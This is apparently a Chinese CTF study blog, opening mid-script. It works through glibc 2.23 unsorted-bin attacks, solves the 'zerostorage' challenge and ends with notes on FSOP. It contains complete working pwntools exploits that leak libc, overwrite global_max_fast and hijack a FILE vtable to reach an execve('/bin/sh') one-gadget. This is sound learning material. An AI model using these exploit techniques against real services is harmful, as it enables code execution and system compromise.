payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#---------------------------------------------↑
#gdb.attach(p,'brva 0x113c')
delete(5)#(0,1,2,3,4)#set 0x200 chunk to ub

# Phase 4: point the freed 0x200 chunk's second pointer word at 0x133707c0.
#reset 0x200 chunk's bk-----------------------↓
fake_chunk=0x133707c0
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)
payload+=p64(0)+p64(0x133707d8-0x20)
payload+='a'*0x3e0
payload+=p64(0)+p64(0x201)
payload+=p64(0)+p64(fake_chunk)
update(1,len(payload),payload)
#---------------------------------------------↑

alloc(0x1f0)#5 after this we can alloc the first 0x5? chunk
#and we need to pass the chunk_is_mmapped check in _libc_malloc randomly XD
# NOTE(review): called with no arguments, so this only logs an empty label
# and 0x0; it looks like a leftover progress marker.
loginfo()

alloc(0x40)#6 get first mmap region chunk out
update(6,0x18,p64(0x100)+p64(0)+p64(0x133707b0))
#set another fake size&bk,and bk is used for writing libc address:(bck->fd = unsorted_chunks (av))

#reset 0x420 chunk's bk again----------------↓
#because we write the 0x420chunk's address(victim) on the bk of 0x5? chunk
#after we malloc out the 0x5? chunk,the 0x420 chunk back to unsortedbin again
#we can control the chunk's bk for malloc out the random_area next time
fake_chunk=0x133707c8
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+='a'*0x400
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+=p64(0)+p64(fake_chunk)
payload+='a'*0x400
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#--------------------------------------------↑

#We can allocate a 0x100 chunk at the random_area! Play our leak&write game now!!!!!!!!!!!!!!!!!!
alloc(0x410)#7
alloc(0xf0)#8

# Phase 5: through entry 8, write 0x13377331 followed by a (pointer, size)
# pair of (0x133707c0, 8), then view entry 0 and read 8 bytes as the libc leak.
#Write the libaddress location&view key at index 0----↓
payload=p64(0)*5+p64(0)*2
payload+=p64(0x0)+p64(0x13377331)
payload+=p64(0x133707c0)+p64(8)
update(8,len(payload),payload)
#-----------------------------------------------------↑
view(0)
p.recvuntil('Chunk[0]: ')
libc_base=u64(p.recv(8))-0x3c4b78
loginfo('libc_base',libc_base)


# Phase 6: repoint entry 0 at libc_base+0x3c4b10 (labelled __malloc_hook by
# the comment below), write libc_base+0x4526a there, and trigger an allocation.
#__malloc_hook to index 0---------------------↓
payload=p64(0)*5+p64(0)*2
payload+=p64(0x0)+p64(0x13377331)
payload+=p64(0x3c4b10+libc_base)+p64(8+0xc)
update(8,len(payload),payload)
#---------------------------------------------↑

update(0,8,p64(0x4526a+libc_base))
alloc(0x666)

p.interactive()

how2heap - unsorted_bin&zerostorage

ubuntu16.04 libc2.23

unsorted_bin_into_stack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/*
 * "Unsorted bin into stack" walkthrough; every step is narrated on stderr.
 *
 * Frees one 0x100-byte allocation, then emulates a memory-corruption bug by
 * overwriting the word before the freed pointer (victim[-1]) and the second
 * word of its user area (victim[1]) so that the latter points at a fake
 * chunk built in a local array. The final malloc(0x100) result is printed
 * next to &stack_buffer[2], the address the demo expects to get back.
 *
 * Returns 0 on completion, 1 if one of the initial allocations fails.
 * The first message states the demo needs a glibc built without tcache.
 */
int main() {
    /* Fake chunk: [1] is used as its size word and [3] as its bk word. */
    intptr_t stack_buffer[4] = {0};

    fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");

    fprintf(stderr, "Allocating the victim chunk\n");
    intptr_t *victim = malloc(0x100);

    fprintf(stderr, "Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n");
    intptr_t *p1 = malloc(0x100);

    /* victim[-1] and victim[1] are written below, so a failed allocation
     * must not be allowed to reach that point. */
    if (victim == NULL || p1 == NULL) {
        fprintf(stderr, "malloc failed\n");
        return 1;
    }

    fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", (void *)victim);
    free(victim);

    /* Both messages now end in a newline so they no longer run together. */
    fprintf(stderr, "Create a fake chunk on the stack\n");
    fprintf(stderr, "Set size for next allocation and the bk pointer to any writable address\n");
    stack_buffer[1] = 0x100 + 0x10;
    stack_buffer[3] = (intptr_t)stack_buffer;

    //------------VULNERABILITY-----------
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->size and victim->bk pointer\n");
    fprintf(stderr, "Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n");
    victim[-1] = 32;
    victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack
    //------------------------------------

    fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", (void *)&stack_buffer[2]);
    fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
    return 0;
}

意思就是unsortedbin上有一个chunk,然后模拟漏洞更改了其size和bk,这样再malloc相同大小的chunk时这块chunk就不会被malloc,会被放到smallbin里面去,其中libc2.23中unsortedbin卸下的操作是:

1
2
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

这里bck就是victim->bk,所以卸下操作基本都是与bk指针相关,与fd无关。这个代码中只需要将栈上对应的size字段和bk设置好即可,0x100chunk被放到smallbin后unsortedbin中情况如图所示

此时可以无限malloc(0x100)都是这个stack chunk,bck始终是他自己

unsorted_bin_attack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>

/*
 * Unsorted bin attack walkthrough; every step is narrated on stderr.
 *
 * Frees one 0x410-byte allocation, then emulates a memory-corruption bug by
 * overwriting the second word of the freed user area (p[1]) with the address
 * two unsigned longs before stack_var. After one more malloc(0x410) the
 * value of stack_var is printed so the effect can be observed.
 *
 * Returns 0 on completion, 1 if the first allocation fails.
 */
int main(){
    fprintf(stderr, "This technique only works with buffers not going into tcache, either because the tcache-option for "
        "glibc was disabled, or because the buffers are bigger than 0x408 bytes. See build_glibc.sh for build "
        "instructions.\n");
    fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
    fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
        "global variable global_max_fast in libc for further fastbin attack\n\n");

    /* The write target; starts at zero so a change is visible. */
    unsigned long stack_var=0;
    fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
    /* %lu matches the unsigned long argument. */
    fprintf(stderr, "%p: %lu\n\n", (void*)&stack_var, stack_var);

    unsigned long *p=malloc(0x410);
    /* p[1] is read and written after the free below, so p must be valid. */
    if (p == NULL) {
        fprintf(stderr, "malloc failed\n");
        return 1;
    }
    fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",(void*)p);
    /* The second literal now starts with a space; previously the two pieces
     * joined as "withthe first one". */
    fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
        " the first one during the free()\n\n");
    malloc(500);

    free(p);
    fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
        "point to %p\n",(void*)p[1]);

    //------------VULNERABILITY-----------

    p[1]=(unsigned long)(&stack_var-2);
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
    fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

    //------------------------------------

    malloc(0x410);
    fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
        "rewritten:\n");
    fprintf(stderr, "%p: %p\n", (void*)&stack_var, (void*)stack_var);
    return 0;
}

这个的原理也是借助于unsortedbin上的卸链表的操作,当unsortedbin上有chunk时,卸链表操作有一个:
bck->fd=unsorted_chunks (av);
在这里,我们首先把chunk的bk改成了栈指针,所以在获取bck的时候bck就会是一个栈地址,然后malloc在unsortedbin上成功匹配到chunk之后,即使没有去接着malloc chunk,对应栈地址+2*size_t的地方也会填上main_arena的地址,这也是这个利用和上面那个利用不一样(不用修改size字段)的原因

这两个都不难我这里就不debug了,直接撸题吧

zerostorage

程序说实话好像逆起来有点复杂,直接看流程更清晰明了

程序分析(流程)

bss段上存了一个记录结构体数组,这个结构体主要是用来管理对应chunk的,分别记录了表示use_or_not的flag、可用长度还有指针(xor了一个随机的mask,导致真正的指针没有存在bss段)

Insert

找记录数组看还有没有剩余的位置,最多记录0x20个

输入的length不能小于0

len>0x1000 calloc(0x1000) read(0x1000)///set ent->len=0x1000
if 0x80<=len<=0x1000 calloc(len) read(len)///set ent->len=len
len<0x80 calloc(0x80) read(len)///set ent->len=len

然后就差不多是读ent->len长度的数据了,这里的比对操作差不多就是为了申请的chunk在0x80~0x1000之间,

update

input(index)

check(index>0x1F,ent->use_or_not)
input(len) check(len>0)
if len>0x1000 a=0x1000 c=0x1000
if 0x80<=len<=0x1000 a=len c=len
if len<0x80 a=0x80 c=len
这个也是为了控制大小在0x80~0x1000之间

if ent->len>=0x80 b=ent->len
else b=0x80

if a!=b realloc(ptr_mask^ent->ptr,a)

readn(ptr,c)
然后更新记录

merge

need ent_num>1
input(fromID) check(fromID>0x1F,mergechunk1.use_or_not)
input(toID) check(toID>0x1F,mergechunk2.use_or_not)
a=0x80,b=0x80
if fromlen+tolen>=0x80 b=fromlen+tolen
if tolen>=0x80 a=tolen

if a==b cpy_len=fromlen
else realloc(to_ptr,b) cpy_len=fromlen
memcpy(chunk_toptr + to_len, from_ptr, cpy_len);
把from的数据拷到新的chunk里对应的位置去

更新一个新的记录
free(from_ptr)
清除掉合并的两个记录

delete

这个就很简单了就是input然后check然后free,并清除掉记录

input(id) check(id>0x1F,use_or_not)
free(ptr) clear record

view

view就是按记录的长度,输出chunk上长度为n的内容

input(id) check(id>0x1F,use_or_not)
write_n

list

输出对应记录的下标和记录下来的长度

漏洞分析

这个题我最开始看了很久主要是因为真的太乱了,特别是前面比来比去的操作,而且我当时没记笔记有点蠢,以后这种比来比去的操作直接记笔记,这样可以知道程序到底是为了干什么

然后漏洞的话基本上第一眼看上去溢出和leak都不行,毕竟什么记录之类的也都在free之后清除了,申请的时候使用的也是calloc,然后再仔细就会发现如果merge中输入的fromID和toID相等的话就会形成UAF,比如先calloc 3个0x90的chunk然后delete第二个,merge(0,0)的话就会把第一个chunk合并成一个0x120的chunk存在记录[1]处,然后free掉这个0x120的chunk,由于是在unsortedbin上所以可以在之前再free一个,设置这个chunk的fd指向那个chunk,再去view的时候就可以leak heap和libc了,而且也可以通过update来更改chunk中的内容

由于这种题是第一次接触,自己也还傻傻不清楚unsortedbin attack怎么用,所以参考了一些师傅们的题解,然后发现这种方法可以用来修改global_max_fast这个变量,然而在我参考的过程中发现,由于原题环境是在ubuntu14系统下,当时还存在一个获取libc地址之后直接获取程序地址的操作,所以原题的思路是在bss段伪造一个堆块,然后把bss给malloc出来,获得mask之后修改指针实现任意地址写。但是在ubuntu16下面这个操作已经不存在了,所以又照着新解学习了很多_IO_FILE的知识

学了FSOP再来分析漏洞,此时已经有了libc地址和heap地址,还更改了global_max_fast,接下来如果使用FSOP的话应该怎么用呢…我第一个想到的还是fastbin attack(写完第一个思路之后回来发现师傅还有一个思路,简直不能再爽23333,所以我这里写了两个解法),之前fastbin attack能修改__malloc_hook主要是因为存在0x7f这个特殊值,但是现在就似乎变得更棘手了一些堆块又不能大于0x1000,又不能小于0x80

….不过果然只要细心一点找还是找的到fake size的,如图

我在stderr对应的FILE中找到了一个0xfb的fakesize,这个本来是FILE的flag值,但是既然你有个0xfb我就不客气的拿下了….distance也是足够的,只要劫持你到我堆上伪造的vtable就完事了

Exploit1

接着上面的想法我成功的跑通了自己的思路奥利给!(还是那句话,用自己的方法写出来真的太开心了23333)

  1. 首先就是先多申请几个chunk,其中一个大小是0x74
  2. merge 0x74的chunk,这时候能merge出来一个0xf0的chunk
  3. 再弄一个merge自己的chunk,此时在unsortedbin链中这个chunk的fd是我们之前0xf0的chunk,bk是unsortedbin,达到leak,而且由于这个chunk是unsortedbin链头,所以这个也刚好用来改global_max_fast
  4. 然后把0xf0的chunk从unsortedbin calloc出来,为了后面的fastbin attack(毕竟是UAF的chunk,我们有两个记录可以用来改它2333)
  5. 把第三步merge自己的chunk也calloc出来,这步只是为了改global_max_fast
  6. delete之前的0xf0的chunk,然后改fd(fastbin attack)
  7. 这里注意再insert的时候就可以把fake vtable放上去了,为了等下用
  8. 再insert就是改写_IO_2_1_stderr_的东西了,注意计算对应于fakechunk的偏移
  9. 退出getshell

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# --- target / process setup -------------------------------------------------
binary = './zerostorage' #binary's name here
context.binary = binary #context here
context.log_level='debug'
# The target is driven through a pty for both stdin and stdout.
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack a possibly short leak by zero-padding it to the full word width.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
# libc offset used below as the unsorted-bin attack target (global_max_fast).
g_m_f=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log `what` followed by `address` in hex, highlighted with ANSI colour."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
#todo here
def insert(size,content):
    """Menu option 1: create a new entry of `size` bytes holding `content`.

    `content` is sent with send() (no trailing newline), so callers pass
    exactly `size` bytes.
    """
    p.recvuntil('Your choice: ')
    p.sendline('1')
    p.recvuntil('Length of new entry: ')
    p.sendline(str(size))
    p.recvuntil('Enter your data: ')
    p.send(content)
def update(id,size,content):
    """Menu option 2: rewrite entry `id` with `size` bytes of `content`."""
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
    p.recvuntil("Length of entry: ")
    p.sendline(str(size))
    p.recvuntil('Enter your data: ')
    p.send(content)
def merge(fromid,toid):
    """Menu option 3: merge entry `fromid` into entry `toid`."""
    p.recvuntil('Your choice: ')
    p.sendline('3')
    p.recvuntil('from Entry ID: ')
    p.sendline(str(fromid))
    p.recvuntil('to Entry ID: ')
    p.sendline(str(toid))
def delete(id):
    """Menu option 4: delete entry `id`."""
    p.recvuntil('Your choice: ')
    p.sendline('4')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
def view(id):
    """Menu option 5: ask the program to print entry `id`.

    Only sends the request; the caller reads the reply from `p`.
    """
    p.recvuntil('Your choice: ')
    p.sendline('5')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
# Exploit 1: unsorted-bin attack on global_max_fast, then a fastbin attack
# onto a fake chunk inside libc's stderr FILE to redirect its vtable pointer.
insert(0x80,'a'*0x80)#0
insert(0x80,'b'*0x80)#1
insert(0x80,'c'*0x80)#2
insert(0x74,'d'*0x74)#3 merging this entry with itself yields a chunk with a 0xfX size, needed later
insert(0x80,'e'*0x80)#4
insert(0x80,'f'*0x80)#5

delete(4)# must delete 4 first; otherwise the space freed by realloc during the merge gets double-freed
merge(3,3)
delete(1)
merge(0,0)

# The self-merged entry is still readable although its chunk is free, so
# viewing it leaks the free-list pointers: a heap address, then a libc address.
view(1)
p.recvuntil(':\n')
heap_base=my_u64(p.recv(8))-0x1b0
libc_base=my_u64(p.recv(8))-0x3c4b78
loginfo('heap_base',heap_base)

# Fake chunk inside libc, chosen so that a 0xfb value serves as its size field.
fakechunk_offset=0x3c553b
pad_len=0xcd# distance from the fake chunk's data to the vtable pointer


# Unsorted-bin attack: set bk to global_max_fast-0x10 so a later allocation
# from the unsorted bin overwrites global_max_fast.
update(1,0x110,p64(0)+p64(libc_base+g_m_f-0x10)+'a'*0x100)
insert(0xe0,'+'*0xe0)
insert(0x110,'*'*0x110)

# Fastbin attack: free the 0xf0 chunk, then overwrite its fd through the
# other entry that still refers to it.
delete(0)
update(4,0xe8,p64(libc_base+fakechunk_offset)+'0'*0xe0)
# This allocation also plants the fake vtable: three zero slots, then the one-gadget.
insert(0xe0,p64(0)*3+p64(libc_base+0x4526a)+'.'*0xc0)

# All offsets below are relative to the fake chunk, which makes them a bit fiddly.
payload='.'*0x15+p64(0)+p64(1) # satisfy _IO_write_ptr (offset 0x28) > _IO_write_base (offset 0x20)
payload=payload.ljust(pad_len,'\x00') # keep _mode (offset 0xc0) <= 0
insert(0xe0,(payload+p64(heap_base+0x1c0)).ljust(0xe0,'\xee'))

p.sendline('7')#trigger
p.interactive()

Exploit2

修改global_max_fast之后我本来是只想到了利用fastbin attack,但是发现好像有一个更牛逼的操作:

因为fastbin的限制现在变的特别大了,所以如果我们的chunk足够大的时候可以直接将chunk的地址填到别的地方去而不是fastbin的那个数组…这应该也算是数组越界的一个应用了,太顶了
如下(这是main_arena之后的可写数据段,一下就看到了一些熟悉的东西,而且指不定还有什么可以改,只要咱们的chunk够大2333):

师傅们的操作是改了_IO_list_all,然后在对应chunk上伪造一个FILE,这里说一下写EXP自己踩的几个坑

  1. leak的时候unsortedbin上是有两个chunk的,所以干脆把链尾的那个chunk弄成0x400后面merge的时候可以直接取下来,省去了再insert的步骤,然后把fake_err和fake table都update到0x1000的那个chunk里面去
  2. 前面0x1000的chunk和0x400的chunk直接挨着就好
  3. _IO_list_all指向的是chunk header,但是我们写的时候是从data段开始写的,所以要注意这里少0x10个偏移,前面0x10的数据也用不了

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# --- target / process setup -------------------------------------------------
binary = './zerostorage' #binary's name here
context.binary = binary #context here
context.log_level='debug'
# The target is driven through a pty for both stdin and stdout.
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack a possibly short leak by zero-padding it to the full word width.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
# libc offset used below as the unsorted-bin attack target (global_max_fast).
g_m_f=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log `what` followed by `address` in hex, highlighted with ANSI colour."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
#todo here
def insert(size,content):
    """Menu option 1: create a new entry of `size` bytes holding `content`.

    `content` is sent with send() (no trailing newline), so callers pass
    exactly `size` bytes.
    """
    p.recvuntil('Your choice: ')
    p.sendline('1')
    p.recvuntil('Length of new entry: ')
    p.sendline(str(size))
    p.recvuntil('Enter your data: ')
    p.send(content)
def update(id,size,content):
    """Menu option 2: rewrite entry `id` with `size` bytes of `content`."""
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
    p.recvuntil("Length of entry: ")
    p.sendline(str(size))
    p.recvuntil('Enter your data: ')
    p.send(content)
def merge(fromid,toid):
    """Menu option 3: merge entry `fromid` into entry `toid`."""
    p.recvuntil('Your choice: ')
    p.sendline('3')
    p.recvuntil('from Entry ID: ')
    p.sendline(str(fromid))
    p.recvuntil('to Entry ID: ')
    p.sendline(str(toid))
def delete(id):
    """Menu option 4: delete entry `id`."""
    p.recvuntil('Your choice: ')
    p.sendline('4')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
def view(id):
    """Menu option 5: ask the program to print entry `id`.

    Only sends the request; the caller reads the reply from `p`.
    """
    p.recvuntil('Your choice: ')
    p.sendline('5')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
# Exploit 2: enlarge global_max_fast, then free a very large chunk so that its
# address is stored past the fastbin array, over _IO_list_all. The chunk holds
# a forged FILE whose vtable points at a fake table inside the same chunk.
insert(0x80,'a'*0x80)#0
insert(0x80,'b'*0x80)#1
insert(0x1000,'d'*0x1000)#2
insert(0x3f0,'e'*0x3f0)#3
insert(0x3f0,'f'*0x3f0)#4
insert(0x80,'g'*0x80)#5

delete(3)#delete for leak&merge

delete(1)#delete for merge
merge(0,0)
view(1)#leak

# The first 8 leaked bytes are a heap pointer, the next 8 a libc pointer;
# the offsets below rebase them.
heap_off=-0x1130
libc_off=-0x3c4b78
p.recvuntil(':\n')
heap_base=heap_off+u64(p.recv(8))
libc_base=libc_off+u64(p.recv(8))
loginfo("heapbase",heap_base)
loginfo("libcbase",libc_base)

# Forged FILE. The string starts at the chunk's data area, i.e. FILE offset
# 0x10, so string offset N corresponds to FILE offset N+0x10.
# After the 0x10 zero bytes: _IO_write_base (0x20) = 0 and _IO_write_ptr (0x28) = 16,
# which gives write_ptr > write_base.
fake_err=''.ljust(0x10,'\x00')+p64(0)+p64(16)+p64(0)*7#offset-0x10 because '_IO_list_all' will point to the chunk header
# FILE offsets 0x68.. : _chain, _fileno/_flags2, _old_offset, _cur_column.., _lock
# (the two libc addresses are presumably a real FILE and a real lock - verify for your libc).
fake_err+=p64(libc_base+0x3c5620)+p64(2)+p64(0xffffffffffffffff)+p64(0)+p64(libc_base+0x3c6770)
# Zero padding keeps _mode (FILE offset 0xc0) at 0.
fake_err=fake_err.ljust(0xc0,'\x00')+p64(0)
# String offset 0xc8 == FILE offset 0xd8: the vtable pointer, aimed at fake_table below.
fake_err=fake_err.ljust(0xc8,'\x00')+p64(heap_base+0x200)

# Fake vtable: three zero slots, then the one-gadget in the fourth (__overflow) slot.
fake_table=p64(0)*3+p64(libc_base+0x4526a)


update(2,0x1000,(fake_err+fake_table).ljust(0x1000,'\x00'))#update to fake err FILE

merge(4,2)#merge to 0x1410 and unsortedbin have only one chunk now because of the UNLINK

update(1,0x100,p64(0)+p64(libc_base+g_m_f-0x10)+'2'*0xf0)#update for next insert to change global_max_fast

insert(0x110,'\x33'*0x110)#change global_max_fast

delete(0)#delete 0x1410chunk

# Option 7 makes the program exit, which triggers the FILE flush path.
p.sendline('7')


p.interactive()

FSOP学习

由于刷how2heap时碰到了一题zerostorage,这个题在ubuntu14上由于存在一个offset2lib的攻击,所以在泄露libc地址之后可以get到程序的地址,但是我复现这个题是在ubuntu16下面做的,所以这个攻击方法无效XD,得另寻他路,所以我找到了raycp师傅的这篇文章,上面提到了FSOP这个攻击姿势,理所当然我当然要啃一啃了,顺带借助了一下CTFwiki和师傅的另一篇博客

FILE *

首先来看一下FILE这个结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */

struct _IO_marker *_markers;

struct _IO_FILE *_chain;

int _fileno;//fd
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */

#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];

/* char* _save_gptr; char* _save_egptr; */

_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

_IO_FILE_plus&_IO_jump_t

还有FILE结构体的封装和vtable,当然最最主要的就是这个指针和这个table了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
 * A FILE object followed immediately by a pointer to its jump table.
 * The vtable pointer sits right after the embedded _IO_FILE; the exploits in
 * this article work by redirecting that pointer to a forged table.
 */
struct _IO_FILE_plus
{
_IO_FILE file;
/* Table of stream operations used for this FILE. */
const struct _IO_jump_t *vtable;
};
/*
 * Jump table of stream operations, one slot per operation.
 * Slot order matters when forging a table: __overflow is the fourth slot,
 * which is why the fake tables in this article are "three zero words, then
 * the target address".
 */
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
/* Slot reached from _IO_flush_all_lockp at exit (per the call chains listed in the article). */
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
get_column;
set_column;
#endif
};

调用链

table中对应函数的调用姿势会尝试着慢慢更新的,现在菜鸡学到的有这几种:

  1. 利用的是在程序调用 exit 后,会遍历 _IO_list_all ,调用 _IO_2_1_stdout_ 下的 vtable 中的 _setbuf 函数(wiki)

  2. puts 在源码中实现的函数是_IO_puts,这个函数的操作与 fwrite 的流程大致相同,函数内部同样会调用 vtable 中的_IO_sputn,结果会执行_IO_new_file_xsputn,最后会调用到系统接口 write 函数。(wiki)

  3. printf 调用栈(wiki):

    1
    2
    3
    4
    5
    6
    vfprintf+11
    _IO_file_xsputn
    _IO_file_overflow
    funlockfile
    _IO_file_write
    write

    自己试出来的几种,有些不同都是得自己去看源码啊(跪),好像和上面比起来没有看到那个overflow:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    ► f 0     7ffff7b042b0 write(没有setbuf,输出结尾有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a87409 _IO_do_write+121
    f 3 7ffff7a87409 _IO_do_write+121
    f 4 7ffff7a8647d _IO_file_xsputn+669
    f 5 7ffff7a5a92d vfprintf+1981
    f 6 7ffff7a62899 printf+153
    f 7 40053e main+24

    ► f 0 7ffff7b042b0 write()(setbuf(stdout,0),输出结尾有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a8638a _IO_file_xsputn+426
    f 3 7ffff7a8638a _IO_file_xsputn+426
    f 4 7ffff7a5cf94 buffered_vfprintf+308
    f 5 7ffff7a5a32d vfprintf+445
    f 6 7ffff7a62899 printf+153
    f 7 4005e2 main+44

    ► f 0 7ffff7b042b0 write(没有setbuf,输出结尾没有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a87409 _IO_do_write+121
    f 3 7ffff7a87409 _IO_do_write+121
    f 4 7ffff7a89196 _IO_flush_all_lockp+374
    f 5 7ffff7a8932a _IO_cleanup+26
    f 6 7ffff7a46f9b __run_exit_handlers+139
    f 7 7ffff7a47045
    f 8 7ffff7a2d837 __libc_start_main+247

    ► f 0 7ffff7b042b0 write(setbuf(stdout,0),输出结尾没有换行)
    f 1 7ffff7a85bff _IO_file_write+143
